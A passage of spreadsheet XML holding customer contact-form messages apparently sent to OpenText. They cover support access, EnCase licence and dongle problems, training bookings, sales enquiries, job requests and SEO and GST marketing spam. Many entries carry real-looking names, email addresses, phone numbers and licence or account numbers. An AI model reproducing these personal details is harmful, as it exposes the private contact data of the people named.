Furthermore, it is a valuable chance to exchange information for future expansion plans and connect with the representatives of the ABA office. _x000D_
We look forward to receiving your feedback. _x000D_
Best regards,_x000D_
Graciela de Gregorio_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Opentext,_x000D_
Application installers needed.._x000D_
_x000D_
I have received to electronic keys for Encase Forensics and I require access to the installers for release Encase Forensic 6.19.7._x000D_
The new licenses were purchased with the understanding they would be backward compatible with existing Encase version our mutual customer already has licenses for._x000D_
_x000D_
Please advise._x000D_
_x000D_
Existing ticket to convert other licenses to electronic is OTCS Ticket 4064952_x000D_
Order convert 2 new licenses bought by Epiq to electronic is OpenText EnCase® Order Fulfillment No.: 8000039181 Sales Ord. No.: 53491 PO Number: RMA 4064952_x000D_
_x000D_
Thank you,_x000D_
Steven Maring_x000D_
Epiq | Sr. Systems Engineer, Business Applications Engineering_x000D_
1201 Third Avenue, Suite 500_x000D_
Seattle, WA 98101_x000D_
Mobile: +1 206 579 7318_x000D_
Office: +1 425 467 3065_x000D_
Email: steven.maring@epiqglobal.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To find work </t>
  </si>
  <si>
    <t>I'm looking to get my access restored so that I can transfer the account to another user.</t>
  </si>
  <si>
    <t>Navistar would like to speak with OpenText regarding a DMS project we have coming up. In order to do that we need to get a NDA in place. Please provide contact info for someone I can send NDA form to. Thank you.</t>
  </si>
  <si>
    <t>Can we have one more account that is capable of opening support tickets and has the same privilege as my account? My colleague's email address is blodhia@metrofloors.com. Thanks!! -Ted</t>
  </si>
  <si>
    <t>Boa tarde,_x000D_
Hoje temos uma central de atendimento a qual temos gravações de áudio porém precisamos de uma ferramenta de speech analytics para a análise desses áudios e além a transcrição e indexação desses áudios.</t>
  </si>
  <si>
    <t>Request for new Knowledge Center and My Support Account (previous ticket 4064623 but I could not confirm because emails were blocked through our firewall, so the ticket was closed).</t>
  </si>
  <si>
    <t>Question concerning end of life for ApplicationXtender Version 7. Have been told that it was extended to year 2020. I have seen paperwork that it is only till January 2019. Which is true?</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a product that can maintain all the resume information (skills, projects, etc) of our consulting staff.  This product will also need to generate resumes from this information (with the ability to include/exclude certain information).  A lead has pointed us in your direction.  Do you have a product that would help with that? </t>
  </si>
  <si>
    <t>Will you be offering "3-8010 Documentum Technical Fundamentals v16.4" in a North America as a in-person classroom option in the near future?</t>
  </si>
  <si>
    <t>You Website Very good! Thanks!</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We would like to know if one of your OpenText products can support the following:_x000D_
Based on a document template (word), we have parts of that document that a user can change freely, others he needs to choose from a multiple option and other parts of the same document he cannot change._x000D_
So basically, we want to control which parts of the document user cannot change and others he can change but following some business rules._x000D_
_x000D_
Do you have any product that supports this out-of-the-box? Yes, which one?_x000D_
If one supports but not out-of-the-box, which one can we customize to accomplish it?_x000D_
_x000D_
Thank you_x000D_
Best Regards_x000D_
RS</t>
  </si>
  <si>
    <t>I am about to run out of licenses to build External Trading Partner profiles in my BizManager software and need to speak with someone who can help me.</t>
  </si>
  <si>
    <t xml:space="preserve">Our company is interested in your product and would like to, firstly, request a pricing guide for review before arranging a demonstration that ideally is directed towards the building industry. Please contact myself or Kelly Hudson on the number, or email address provided.  _x000D_
We look forward to hearing from you._x000D_
</t>
  </si>
  <si>
    <t>Billing Change.   All invoices to Stevens Transport need to have:_x000D_
ATTN: David Drew_x000D_
He will be taking my position as IT Director</t>
  </si>
  <si>
    <t>Hello Sir_x000D_
_x000D_
Our company is an India based software Solutions Company, we are capable of providing various ranges of software development solutions._x000D_
Our Services are...._x000D_
. Software development or web application development and E-commerce application development._x000D_
. Android Application development solution._x000D_
. I phone Application development._x000D_
. Quick book integration_x000D_
. We provide custom software development solution._x000D_
. Email marketing services (We are capable to do your product or email marketing on hire basis)._x000D_
_x000D_
Our company provides very good quality services._x000D_
If you need any software solutions do let me know, I will get in touch with you._x000D_
_x000D_
Kind Regards_x000D_
_x000D_
Sonal Sahu_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t xml:space="preserve">I have company but I want machines and equipment bakie </t>
  </si>
  <si>
    <t xml:space="preserve">Is there a machine learning tool available from OpenText/Documentum that you can feed some basic information and have it copy data from an existing SOP to a new SOP template?  The goal to consolidate SOPs and reduce the layers in documentation.  Does such a tool exist?_x000D_
</t>
  </si>
  <si>
    <t>Hello, we want to procure EDI service but our contacts at OpenText/GSX have not responded to our queries for over a week. Can you please advise what is the hold up?_x000D_
Our contacts: John Quilty &lt;jquilty@opentext.com&gt;, Steve Williams &lt;stevewil@opentext.com&gt;</t>
  </si>
  <si>
    <t>good afternoon, i need to know exactly when my license will expire and if i can use Encase without updating after that date. thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
wir möchten gern folgende Schulungen buchen :_x000D_
3-0127	Lowak, Mario Mario_Lowak@deichmann.com_x000D_
3-0127	Koriath, Martin martin_koriath@deichmann.com_x000D_
3-0188 Blumenthal, Niklas  niklas_blumenthal@deichmann.com_x000D_
Können Sie uns diese Buchungen bestätigen ?_x000D_
Mit freundlichem Gruß_x000D_
Stefanie Poppe_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I don't have access to all ressources. I'm partner, I need to have access to all ressources Documentum and the support, and the knowledge database. Thanks a lot.</t>
  </si>
  <si>
    <t>We are missing several number that are our fax lines. How do i get those numbers back</t>
  </si>
  <si>
    <t xml:space="preserve">Hi. I sent the following email to "encasetraining@opentext.com":_x000D_
_x000D_
Hi. I work as a forensic examiner in Norway for law enforcement._x000D_
_x000D_
I would like a 1 year encase annual training passport. I am not certain how we order this? In this department it is usually paid by invoice._x000D_
_x000D_
The invoice will of coarse be paid before I take any courses however I would like to attend these two:_x000D_
_x000D_
DF120 – Foundations - Washington, Feb 05_x000D_
DF210 - Building – Washington, Feb 12._x000D_
 _x000D_
1. Is it possible to get an invoice for the 1 year annual training pass ($6,495.00 per Passport.)_x000D_
2. Is it possible to get a place reserved for both classes in Washington so that they don’t get full before my pass is paid?_x000D_
</t>
  </si>
  <si>
    <t>Looking for formal acquisition/transfer documentation regarding HP Exstream.</t>
  </si>
  <si>
    <t>We are not partners of Opentext but would like to be support partners in this region.  Please advise.</t>
  </si>
  <si>
    <t>MM</t>
  </si>
  <si>
    <t>We cannot buy EnCase and Tableau products from Bounga Informatics Pte. Ltd., Singapore. They have terminated our reseller status. But we want to continue supply your products to our customers. Please assist and support us can sell EnCase and Tableau products. Thank you.</t>
  </si>
  <si>
    <t>You have problems in login, i created an account in opentext, but i cant login on the website developer opentext. I tried to create a new account in the developers area but i recive an error. What can i do?</t>
  </si>
  <si>
    <t>I would like to arrange a meeting to explore your products in regards to my organisation's needs.  Could you please contact me for further discussion?_x000D_
Regards_x000D_
_x000D_
Dominic Monney</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
_x000D_
Notre société, HireRight, est spécialiste dans la validation d’antécédents professionnels. Nous sommes mandatés par nos clients pour vérifier les informations fournies sur les CV du Candidat qui travaillait dans votre société (OPENTEXT, ESPLANADE DU GENERAL DE GAULLE, COURBEVOIE, HAUTS DE SEINE, ILE DE France, 92307). _x000D_
_x000D_
Nous vous serions reconnaissants si vous pouviez nous communiquer le courrier électronique ou le numéro de téléphone d’une personne qui est chargée de la gestion du personnel ou de la vérification des références d’emploi, et qui est autorisée à fournir les informations en question.  Nous cherchons à obtenir  les informations suivantes :_x000D_
_x000D_
Date du commencement d’emploi_x000D_
Date de la fin d’emploi_x000D_
Poste occupé _x000D_
_x000D_
Je me permets de souligner, que ce procédé est parfaitement transparent, et que nous avons une autorisation écrite du candidat pour obtenir ces informations._x000D_
_x000D_
Merci de votre temps et votre attention._x000D_
_x000D_
Veuillez m’indiquer votre poste et votre nom pour référence._x000D_
_x000D_
Cordialement/Kind regards,_x000D_
_x000D_
MONIKA MARCYSIAK | Service Delivery Team | Gun Court, 70 Wapping Lane | London E1W 2RD, UK_x000D_
Tel: +44 1273 760 790 |Fax: +44 1273 760 543| PL: +48 32 2137055 _x000D_
</t>
  </si>
  <si>
    <t>I am unable to access your knowledge downloads which contain software downloads.  Please could you advise how I can gain access to this.</t>
  </si>
  <si>
    <t>Several months ago i lost mysupport access. As i know, Lanit company has full OpentText partner status now. Please restore my access to mysupport</t>
  </si>
  <si>
    <t>Interest in OpenText Axcelerate</t>
  </si>
  <si>
    <t>Hi, I am inquiring for the Spanish job post, I am currently in Makati and I am young professional and a Spanish speaker. Thank you!</t>
  </si>
  <si>
    <t>When sharing files with external links there is meant to be an option to register._x000D_
I have tested by sending to an alternative mail after querying this a few times, and being told the process to follow - Accept the offer the share, then register._x000D_
_x000D_
Once accept is accepted, the only option is to sign in - there is no option for a new user to register._x000D_
_x000D_
please urgently correct as this is a really important step in the process._x000D_
It is causing multiple suppliers to request that alternative sites are used to share information</t>
  </si>
  <si>
    <t>aaaa可口可乐真好喝 aaaa</t>
  </si>
  <si>
    <t>Looking for opportunity in sales, BDM, Marketing.</t>
  </si>
  <si>
    <t>Could you help me check the current status of my certification? _x000D_
Certification#: 15-0416-7035</t>
  </si>
  <si>
    <t xml:space="preserve">Introduction to, overview on features of tools like Magellan, context: specific and adaptive news aggregation </t>
  </si>
  <si>
    <t xml:space="preserve">Issue with IGC LICENSE MANAGER_x000D_
</t>
  </si>
  <si>
    <t>We need complete on-premise solution including software license ,support, testing and hardware(fax lines). Our API should be able to call Open text web service API(deployed on-premise) to send fax. We require 5 to 10 fax lines to be set up at Singapore based location. Please provide quotes for 4 years contract.</t>
  </si>
  <si>
    <t>Looking for a possible new EDI provider.</t>
  </si>
  <si>
    <t>Hi Support,_x000D_
_x000D_
My account creation seems not work._x000D_
_x000D_
My EnCase dongles are : G2002040425 &amp; G2002040436._x000D_
May I know, where can I download the latest version of the Encase ?_x000D_
And where can I re-download the Cert for my EnCase ?_x000D_
_x000D_
Many Thanks !_x000D_
_x000D_
Regards,_x000D_
_x000D_
Alan</t>
  </si>
  <si>
    <t>learn about ability to see text from calls to analyze calls using the text in addition to the recording</t>
  </si>
  <si>
    <t>Our client do not have access on My Support</t>
  </si>
  <si>
    <t>Our client do'nt have access on MySupport</t>
  </si>
  <si>
    <t>Please sign me up to receive your catalogs._x000D_
Thank you,_x000D_
Carol</t>
  </si>
  <si>
    <t>Is it possible to have multiple accounts for 1 email? I am currently supporting 2 products of Opentext. First is MBPM and the other is Opentext Capture Center. I have my email/user already attached in MBPM account with end user code EU0153464, but we're planning to set up also another support account for the Opentext Capture Center. Can you send us the guide on how to set up the other support account? Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Need access to any training materials and questions answered for how to apply containment and security policies to formal cabinets and formal folders.  Plus, would like to know if there is an available class for training on Documentum Records Manager.  _x000D_
Course title is - Documentum Records Manager Administration 2-8505 (53798) and the course description is "_x000D_
This hands-on class provides records administrators and compliance managers with the knowledge required to configure and administer the Records Manager system, including configuring file plans, containment policies, naming policies, retention policies, physical records, and security.  Participants will also explore functional records management features, such as filing records, applying retention markups, making library requests, processing charge-outs and charge-ins, and performing disposition.  "_x000D_
</t>
  </si>
  <si>
    <t>We want to understand the functionality of documentum and see if it can be used by Cstone.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Je serai à Sofia du 23 au 29 dans le cadre de mes affaires. Je souhaiterais profiter avoir un echange avec pour des possibilités d'affaires avec votre société  et l'Afrique de l'Ouest._x000D_
Si vous avez au sein de votre equipe quelqu'un qui parle français ce serait super,  sinon je parle très peu anglais._x000D_
Esperant votre retour _x000D_
Meilleures salutations _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am coming to Legaltech with a few colleagues.  If your company is booking meetings at this year’s conference, we would like to set aside 30 mins to discuss edocs as well as the left side of the EDRM model.  Would you please let me know if this is possible?_x000D_
_x000D_
Our availability is as follows:_x000D_
_x000D_
Tues 1/29: 2-2:30; 3:30-4; 5 to 5:30_x000D_
Wed 1/30: 11:30-1:30; 2:30-3; 5-6_x000D_
Thurs 1/31: 12-1:30_x000D_
_x000D_
Thanks!_x000D_
Frank_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Skylar Weaver, and I work in the Procurement organization at Arcadis. I need to  speak with our contract/account manager to discuss a contract extension. Please email me as soon as possible and I will provide more details._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Skylar</t>
  </si>
  <si>
    <t>I would like to send some of my staff members for Encase training. I have several questions about the difference between Encep and Ence training. If someone would reach out to me I would be greatly appreciative. Thanks, Jonathan</t>
  </si>
  <si>
    <t>I am unable to access Knowledge Portal. It was accessible before. Can it be checked why access revoked ?</t>
  </si>
  <si>
    <t>Looking for more information for a cloud hosted fax to email solution.</t>
  </si>
  <si>
    <t>I would like to gather more information on how RightFax Direct option works and what is entailed in creating an interface with our EHR. Can you please schedule a call to discuss further? Thanks!</t>
  </si>
  <si>
    <t>My Magellan roadmate 9400 has stopped working.</t>
  </si>
  <si>
    <t>My program is stating that I do not have a cert.  this is incorrect.  My dongle s/n is V293966749.  I also attempted to log into my account but the password link displayed an error several times.</t>
  </si>
  <si>
    <t>I'm trying to register to get access to Encase Imager free and Im getting declined twice when I enter my corporate email and when I enter my personal gmail address.</t>
  </si>
  <si>
    <t xml:space="preserve">Im passionate about working as a team and i believe in myself </t>
  </si>
  <si>
    <t>Hello.  We are recent subscribers of Hightail, and we have been trying to let them know that we wish to cancel by contacting them, but we have not received a proper response on how to do this.  Can you help us please? Thanks very much!--Matt</t>
  </si>
  <si>
    <t>I am registered through Learning Central for courses 201A-201M for Rightfax technical assessment.  I am consistently disconnected through any browser (Chrome, Firefox, IE, Edge), receiving "A Fatal error has occurred, communication with the server has been lost.".  This usually occurs in 30 minutes or less of launching the course.  Completing an assessment in this state will cause the assessment results to not be saved and it must be retaken.  In addition, trying to duplicate this on other machines under my account results in me receiving error:  "General Error.  An error has occurred and has been logged by the system."  In this state the assessments are far more time consuming than they should be and I don't see the point in even attempting the final assessment until I can resolve these issues.  Please advise, thank you</t>
  </si>
  <si>
    <t>Because I need this job</t>
  </si>
  <si>
    <t>Please advise on date/support for RightFax 10.6.  We are running that version, but have heard support may be ending and we need to know any dates associated to that.  Also, we need to know if our version of rightFax is compatible with Windows server 2016.  Please advise.</t>
  </si>
  <si>
    <t>Current use of TeamSite by organization is not leveraging many of the newer tools and I'm told that UC Davis doesn't have a license for a test or demo account to make examples for the organization to use those tools. The conclusion was to get the price of a license that would allow demos and example sites to be done.</t>
  </si>
  <si>
    <t>ECM and email archiving solution meeting.  Would like to set up a meeting.  We are calling vendors on the Washington State contract #07814.  Please call to set up a meeting.  I am at ext 110.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to contact an organizer of the Enterprise World 2019 to discuss an opportunity to host clients who are attending the conference at a sporting event.  We would be happy to provide discounted tickets to all the attendees of the conference. </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to receive a price quote on (2) Guidance Software - EnCase Forensics in support of a project for the US Federal Governement.  I have made a few inquries on your website but have not received a response.  If someone could please contact me, and send a price quote, or direct me where i can get pricing, that would be great. Thanks!_x000D_
</t>
  </si>
  <si>
    <t>We have an requirement to design pdf for our customer requirement and we found  xPression  to be suiting requirements. Customer need the Licensing details for Open Text xPression Enterprise Edition application so that we can finalize using this for our development. We need to integrate with IBM sterling (8.5) application.</t>
  </si>
  <si>
    <t>Cannot get to the Knowledge Base or anything. Keeping sending me an email confirmation.</t>
  </si>
  <si>
    <t>West Virginia University owns several Open Text product components that have been rebranded by Ellucian. I would like to talk directly with Open Text about some potential new investment/purchases.</t>
  </si>
  <si>
    <t>My SMS for EnCase has lapsed.  Would it be possible to get a quote to renew the SMS.  In the past, the Guidance SMS Contract number was RR000000009297.  Thank you.</t>
  </si>
  <si>
    <t>I think our support contract expired. Could I get a renewal quote or invoice please?_x000D_
Thank you,_x000D_
-John Akerson</t>
  </si>
  <si>
    <t>I have currently been tasked with Supporting and upgrading Documentum V6.7 and will need to upgrade to Documentum V7.2.  Is there any training courses for upgrading and administering Documentum?</t>
  </si>
  <si>
    <t xml:space="preserve">Cannot sign into the site.  I am the administrator.  </t>
  </si>
  <si>
    <t xml:space="preserve">I have the physical dongle for EnCase 8 registration, but i do not have a way to download and install the software. </t>
  </si>
  <si>
    <t>I would like to be removed from the OpenText eDOCS Customer Alert Blog - but there is no unsubscribe and I no longer have a customer login to remove myself.</t>
  </si>
  <si>
    <t xml:space="preserve">As part of our SAP greenfield project we are going to install these components on Windows.  However I did not find any install guides for on windows.  Could you please share link or send the PDF ASAP? _x000D_
OpenText xECM Content Server, _x000D_
OpenText xECM Archive Server, _x000D_
OpenText xECM DB </t>
  </si>
  <si>
    <t>I'm attempting to pay an over due bill on Account #: 777840 and also change payment type. Please give me a call at 678.282.0220 or email me at administrator@meadowsandohly.com. Thanks</t>
  </si>
  <si>
    <t>Looking for a demo as a potential solution for our pre-clinical data management</t>
  </si>
  <si>
    <t xml:space="preserve">Enquiry </t>
  </si>
  <si>
    <t>I am working on completing some internal documentation and would like some information about Brava! Enterprise that we currently have deployed in our enterprise.  The information I need is mostly system requirements, embedded products, etc.  I look forward to hearing from someone regarding this matter.  Thank you in advance.</t>
  </si>
  <si>
    <t>I have setup my user account. How do I access documentation for Encase eDisco? I like to download some guides for a new version.</t>
  </si>
  <si>
    <t>When I dial 919-792-1515 I get the number has been disconnected instead of the fax tone.</t>
  </si>
  <si>
    <t>I need My Support access , I am having issue on OTMM 7.2.1 Admin portal to update metadata configuration .</t>
  </si>
  <si>
    <t>Client installation for window's 10.</t>
  </si>
  <si>
    <t xml:space="preserve">W-9 Request. Please send at your earliest convenience._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have three consultants who I need to complete both the following during March 2019, ideally in the UK. These do not currently appear to be scheduled in the UK._x000D_
_x000D_
3-0715 Archive Center Installation and Administration V16.2_x000D_
5-0750 Archive Center 16.2 Administrator Certification_x000D_
_x000D_
As part of our partner agreement with Open Text we have a pre-spend on training and we would like to use this to part fund the training._x000D_
_x000D_
Thank you for your help._x000D_
</t>
  </si>
  <si>
    <t>Hi, on our invoices is the quantity wrong. We only have one account; not three._x000D_
We have an account for marius.raht@iot-online.de_x000D_
Please, can you check this for us?_x000D_
_x000D_
Regards,_x000D_
S. Kempa</t>
  </si>
  <si>
    <t xml:space="preserve">I am very interested </t>
  </si>
  <si>
    <t>New business looking for faxing options via email/computer.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
I'm an ICT engineer, working for A. Menarini Industrie Farmaceutiche Riunite s.r.l., an Italian pharmaceutical company and I am in charge of the administration of Documentum Life Sciences Solution for my company. _x000D_
_x000D_
Since we are trying to adopt Documentum more extensively in our business, we are interested in develop our expertise and knowledge of Enterprise Content Management._x000D_
Is it possible to receive more information about the training courses available, date/time and prices?_x000D_
_x000D_
Thank you for your support._x000D_
_x000D_
Kind Regards,_x000D_
Barbara Bertelli_x000D_
</t>
  </si>
  <si>
    <t>We are looking for a company to deal with e-disclosure requirements for a matter whereby we have an enormous amount of disclosure. We would like to know more about the services that you provide and your charges. Can someone please telephone Binal Shah at our offices on the telephone number provided? Many Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, i have a EnCase license with Dongle G3002086006. I am able to use EnCase forensic with the dongle and have the certs file. However when i am supposed to register a email connected to it an error appears. Also the activate email does not work, i click on the activate email that i get and it says account verified. However when i try to register it says i need to verify email. I have done the operation multiple times without being able to get it. </t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I noticed you have BigHand listed as a Partner, which is great, as we have reciprocated. Your link to our website is also present, but we wondered if you could change it to our secure handle, which begins "https://" instead of "http://"_x000D_
_x000D_
Many thanks in advance. We appreciate your help in this matter, and we are happy to make any updates on our end you deem necessary.</t>
  </si>
  <si>
    <t>Unable to login to learning centre</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of purchasing Document Management Software tailor made to Oil and Gas industry._x000D_
_x000D_
We request your sales person to contact us._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We had bought a license from guidance software for Encase Enterprise._x000D_
Could you please provide setup link and instructions for the same._x000D_
_x000D_
Regards,_x000D_
Apurva R_x000D_
</t>
  </si>
  <si>
    <t>This contact would like to know the cost of Documentum training class for support engineer._x000D_
Contact: Phatrakorn Kamheang_x000D_
Company: Fuji Xerox (Thailand) CO Ltd_x000D_
Email: phatrakorn.k@tha.fujixerox.com_x000D_
Phone: +662 6608000_x000D_
_x000D_
Please let me know if you have already responded to him. Thanks!</t>
  </si>
  <si>
    <t>Hi_x000D_
I am Sanjeev  from a leading Search Engine Optimization (SEO) Company based in India._x000D_
As per the trends in your industry - over 80% of people search for your products/services online and buy the same.      _x000D_
1. Would you like to increase the leads / sales generated from your website?_x000D_
2. Do you want Google promotion Service in Affordable price? _x000D_
3. Would you like to be listed at the top of every major search engine such as Google, Yahoo! &amp; Bing for multiple search phrases (keywords) relevant to your products / services?_x000D_
It would be recommended if you go for search engine optimization (SEO) for your website which would increase your web visibility and generate better prospect traffic to your website._x000D_
There is a simple equation that is applicable to the online world._x000D_
Ethical SEO = Better Traffic Higher Sales_x000D_
I look forward for your reply. _x000D_
----------------------_x000D_
Kind Regards,_x000D_
Sanjeev Yadav</t>
  </si>
  <si>
    <t>I cannot access "My Support". Whenever I click on "Confirm Registration" in the confirmation email, it takes me back to the login screen and the status remains unchanged. I want to download the EnCase software, I have recently received the dongle from our Deloitte US colleagues responsible for licensing.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a licence dongle for Encase Forensics, but can't approve it since OpenText My Support isn't working. </t>
  </si>
  <si>
    <t>I heard of the legal requirement in german that email that are business relevant must be archived compliant. As per definition this means it must be archived before it even arrives at the user Inbox. Currently the email archiving for microsoft exchange is implemented, but the process of that software is different. So is it now compliant due to the german law or not?</t>
  </si>
  <si>
    <t>(my dongle number is G2002024304)can you help us about certs?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We need a account manager or sales person to discuss your product and its capabilities within the Mining Sector for an upcoming DMS RFP. We are based in Bedfordview, Johannesburg, South Africa._x000D_
_x000D_
Please put me in contact with such a person._x000D_
_x000D_
Regards,_x000D_
_x000D_
Dawid</t>
  </si>
  <si>
    <t>To Whom May it Concern,_x000D_
_x000D_
My name is Soyoon Park from the University of Suwon._x000D_
_x000D_
I write this letter to ask you about the copyright of EDI Basics free e-Book._x000D_
One of our school's professor wants to use contents of it and images from it to make his new e--learning course._x000D_
_x000D_
Could he use those things if he reveals sources  on the videos?_x000D_
I wait for you to answer this question as soon as possible._x000D_
_x000D_
Yours sincerely,_x000D_
_x000D_
_x000D_
_x000D_
Soyoon Park</t>
  </si>
  <si>
    <t>Dear whom it may concern in RightFax,_x000D_
_x000D_
I have RFP request regarding OpenText RightFax connector with HP device._x000D_
But I don’t know all the specifics on how they interact like protocol, encryption type, etc._x000D_
_x000D_
Do you have a whitepaper on RightFax integration with HP or contact in RightFax?_x000D_
_x000D_
Currently, we need to figure out what encryption is used. _x000D_
Would you help me address this matter in RFP?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
Joey</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
Can you help me figure out why our published Rise output doesn't work on our client's LMS (Learnflex)? The module is successfully uploaded but when the client tests it on their end they receive the message "Your course is loading. Hang tight." Here are the settings:_x000D_
_x000D_
_x000D_
LMS Settings (Also placed a screenshot of this in this discussion):_x000D_
- Scorm 1.2_x000D_
- Track using quiz result_x000D_
- Reporting: Passed/Incomplete_x000D_
- Added an "Exit Course" Link to let the learners easily return to LMS_x000D_
_x000D_
Other settings:_x000D_
_x000D_
- File size is about 60 MB, Module has 1 video and 3 interactive slides published in Storyline 360 then imported in Rise, We used the .woff fonts of Georgia and Calibri. We had these converted and uploaded in Rise._x000D_
_x000D_
 _x000D_
_x000D_
Client views the module via IE 11. It does work on our end when we tested it on Moodle._x000D_
_x000D_
 _x000D_
_x000D_
Thank you! Have a great day!_x000D_
_x000D_
- Beverly</t>
  </si>
  <si>
    <t xml:space="preserve">not been able to download the last version of encase software as the email not been confirmed in my support account </t>
  </si>
  <si>
    <t>The NSW Department of Justice expects to issue a Pre-Tender Notification to pre-selected suppliers who will be invited to respond to the Request for Quotation for a Customer Experience Platform._x000D_
_x000D_
The tentative timeframes are for the Pre-Tender Notification to be issued next week, with RFQ being released on Friday 25 January (or shortly after that date) and a Vendor Briefing held 3 business days after the release. _x000D_
_x000D_
In order participate in the Department’s RFx process, suppliers are required to register in the Justice Procurement Central (JPC) system which is an end to end procurement solution which covers all stages of the procurement cycle (plan, source and manage)._x000D_
_x000D_
Please ensure you and proposed Partner entities are registered in the system, if you wish to be included._x000D_
Note: Registration in the NSW eTendering system does not register a business in Procurement Central._x000D_
_x000D_
Please provide me with the details of Partner entities who you are considering responding on your behalf, so that I can include them in the RFQ._x000D_
_x000D_
Prior to the release of this RFQ, I am your single of point of contact, and all related questions are to be emailed to me as the Procurement Administrator for this RFQ._x000D_
_x000D_
Robin.Blake@justice.nsw.gov.au</t>
  </si>
  <si>
    <t xml:space="preserve">Buena tarde me apoyan con el costo de la aplicacion FIRST-CLASS para ser implementada en mi empresa _x000D_
</t>
  </si>
  <si>
    <t>My name is Robert D. Millman and I took the Encase Digital Forensics I training about 10 years ago and have lost my designation certificate.  Can you email me the certificate (again)?_x000D_
I have entered my data from 2009 to assist in your confirmation, if needed.  Even an email confirming my completion will be helpful._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Looking to get pricing on licenses for OpenText redaction tool, 25+ licenses with increasability.</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings!_x000D_
_x000D_
My name is Monika Raj Sharma and I live in Waterloo. I have a Masters degree in English Literature and a professional degree in Education. I've taught English from grade 9-12 and also served as a content writer to the school. My duties included updating the school website with the latest and work closely with the editorial head for the annual school magazine. I've also worked as an ASL trainer for the school board. It has been six months that I have come to Canada from India as a PR and currently working with the Gap and YMCA as a part time._x000D_
I am looking for an opportunity for optimum usage of my credentials._x000D_
I will be obliged if considered for any position suitable according to my experience._x000D_
_x000D_
Regards_x000D_
_x000D_
Monika Raj Sharma   </t>
  </si>
  <si>
    <t>For job</t>
  </si>
  <si>
    <t>to get assistance frm business industry</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
I can not download encase._x000D_
my license number on the dongle G3002093283._x000D_
cordially_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for consulting services on New Open Text Products to support our document creation of HealthCare EOB, ANOC and EOC. We are looking to retool our existing format and need help in research and development to reduce turn times and increase productivity. _x000D_
</t>
  </si>
  <si>
    <t>work experience for year 12 student</t>
  </si>
  <si>
    <t>Looking for a job plz_x000D_
0638209979</t>
  </si>
  <si>
    <t>In October, December and January (and indeed several times before then), I E-mailed our account manager to inform him that we are no longer Cisco.   My job and our EDI mailbox has moved to a new company, Synamedia.    We need to change the agreement, ownership, invoicing  to the new company.   I have received no help whatsoever on this matter.  Please urgently advise if you are able to support the transition of our mailbox to the new company or if we need to seek an alternative partner to work with.</t>
  </si>
  <si>
    <t>I would like to continue to work from Hightail is now opentext as homebased agent. Ive been with you for the past 3years and half. I trained employees and i am a csr/tsr. Please re consider. You may contact me via jenpagquil@gmail.com or 09061902910</t>
  </si>
  <si>
    <t>Hi _x000D_
I'm looking for information regarding training on Liquid office eform and process designer. Please forward me on any info on how training may be delivered, modules, dates, requirements, etc.._x000D_
_x000D_
Best Regards_x000D_
Peter OReilly</t>
  </si>
  <si>
    <t>Looking for a job</t>
  </si>
  <si>
    <t>because I really really need a job._x000D_
I have many reasons for that.</t>
  </si>
  <si>
    <t>hello_x000D_
can you please let me know about the pricing for your DAM software</t>
  </si>
  <si>
    <t xml:space="preserve">Me suscribí y ya ya no quiero que me envían correo gmail ok gracias </t>
  </si>
  <si>
    <t>Wanted to know scope of opentext in archiving data from our ECC system</t>
  </si>
  <si>
    <t>I want a Nigeria virtual fax number starting with 234</t>
  </si>
  <si>
    <t>Inquiry</t>
  </si>
  <si>
    <t xml:space="preserve">First page rankings on Google_x000D_
_x000D_
We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon. (GUARANTEED RESULTS) Thanks!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sir, _x000D_
Hope you’re doing great…._x000D_
Ram here, from Expert GST Consultants. We are providing exclusive GST Consultant Services._x000D_
Our GST Consultant Services includes_x000D_
	Assisting GST Registration _x000D_
	Assisting on applicability of GST, Selection of HSN Codes and applicability of GST Rates_x000D_
	Assisting on applicability of Reverse Charge Mechanism	_x000D_
	Assisting on availing input tax credit on various expenses and services received  _x000D_
	Preparation of Records and Accounts for outward supply of Goods or Services and filling Returns_x000D_
	Preparation of Records and accounts for inward supply of Goods or services for claiming input tax credit_x000D_
	Finalisation of details of Inward Supplies and outward supplies along with payment of amount of tax – Filling Monthly Return_x000D_
	Preparing a Return for Compounding Taxable Person _x000D_
	Preparing Return for Non Resident Taxable person_x000D_
	Preparing Return for Input Service Distributor_x000D_
	Preparing a Return for authorities deducting tax at source _x000D_
	Preparation of Report of supplies effected through E Commerce operator and Amount of Tax Collected _x000D_
	Preparation of Annual Return_x000D_
	Preparation of Final Return _x000D_
	Preparation of GST E Way Bills for movement of Goods_x000D_
_x000D_
Please reach me on below mentioned contact details for all your GST Related Services._x000D_
</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
